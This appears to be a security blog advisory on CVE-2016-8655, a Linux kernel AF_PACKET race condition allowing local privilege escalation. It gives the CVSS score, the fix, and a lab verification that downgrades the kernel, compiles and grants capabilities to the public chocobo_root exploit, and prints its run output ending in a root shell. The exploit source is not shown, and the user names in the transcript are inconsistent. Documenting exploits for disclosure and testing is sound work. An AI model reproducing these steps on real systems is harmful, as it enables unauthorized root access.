December 30, 2016

CVE-2016-8655

Overview

A race condition in net/packet/af_packet.c of the Linux kernel allows a local user with ordinary privileges to escalate to root.

When packet_set_ring creates a ring buffer, it initializes a timer_list structure if the packet version is TPACKET_V3. If another thread calls setsockopt to switch the version to TPACKET_V1 before packet_set_ring has finished, the two calls race. The result is a use-after-free of the timer_list structure, which can be exploited to gain root privileges. The fix makes packet_setsockopt take lock_sock(sk) when changing the packet version, and makes packet_set_ring take the same lock at its start.

CVSS v3

  • Base Score: 7.8 (High)
  • Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • Impact Score: 5.9
  • Exploitability Score: 1.8
  • Attack Vector (AV): Local
  • Attack Complexity (AC): Low
  • Privileges Required (PR): Low
  • User Interaction (UI): None
  • Scope (S): Unchanged
  • Confidentiality (C): High
  • Integrity (I): High
  • Availability (A): High

Solution and mitigation information

  • Upgrade to Linux Kernel 4.8.14 or later

Affected software versions

  • Linux Kernel 4.8.13

Technical Details

Verifying the exploit

Preparing an environment compatible with chocobo_root.c

khanhnn@CVE-2016-8655 ~ $ sudo apt-get install linux-image-4.4.0-51-generic linux-headers-4.4.0-51-generic
khanhnn@CVE-2016-8655 ~ $ sudo apt-get remove linux-image-4.4.0-53-generic linux-headers-4.4.0-53-generic
khanhnn@CVE-2016-8655 ~ $ sudo reboot
khanhnn@CVE-2016-8655 ~ $ uname -a
Linux CVE-2016-8655.test 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
khanhnn@CVE-2016-8655 ~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.1 LTS
Release:        16.04
Codename:       xenial

Compiling and setting file capabilities

khanhnn@CVE-2016-8655 ~ $ gcc chocobo_root.c -o chocobo_root -lpthread
khanhnn@CVE-2016-8655 ~ $ ls -l chocobo_root
khanhnn@CVE-2016-8655 ~ $ sudo apt-get install libcap2-bin
khanhnn@CVE-2016-8655 ~ $ sudo setcap cap_net_raw+ep /home/kosuke/chocobo_root
khanhnn@CVE-2016-8655 ~ $ getcap ./chocobo_root
./chocobo_root = cap_net_raw+ep

Run

khanhnn@CVE-2016-8655 ~ $ ./chocobo_root
linux AF_PACKET race condition exploit by rebel
kernel version: 4.4.0-51-generic #72
proc_dostring = 0xffffffff81088090
modprobe_path = 0xffffffff81e48f80
register_sysctl_table = 0xffffffff812879a0
set_memory_rw = 0xffffffff8106f320
exploit starting
making vsyscall page writable..

new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 102949, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 122693, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 124639, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying..
vsyscall page altered!


stage 1 completed
registering new sysctl..

new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 564981, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying..
sysctl added!

stage 2 completed
binary executed by kernel, launching rootshell
root@CVE-2016-8655 ~ # id
uid=0(root) gid=0(root) groups=0(root),1001(kosuke)

Summary

If an attacker has already gained a foothold through a vulnerable service, this vulnerability is likely to let them escalate to root from any binary that carries the cap_net_raw capability, or from any process whose behaviour they can alter.

Sources of information

References

  • http://securityaffairs.co/wordpress/54168/hacking/cve-2016-8655-linux-kernel.html
  • http://seclists.org/oss-sec/2016/q4/607
  • https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c
  • http://jvndb.jvn.jp/ja/contents/2016/JVNDB-2016-006125.html
  • https://wiki.archlinuxjp.org/index.php/%E3%82%B1%E3%82%A4%E3%83%91%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3
  • http://www.vagrantbox.es/
Posted at 10:16 am
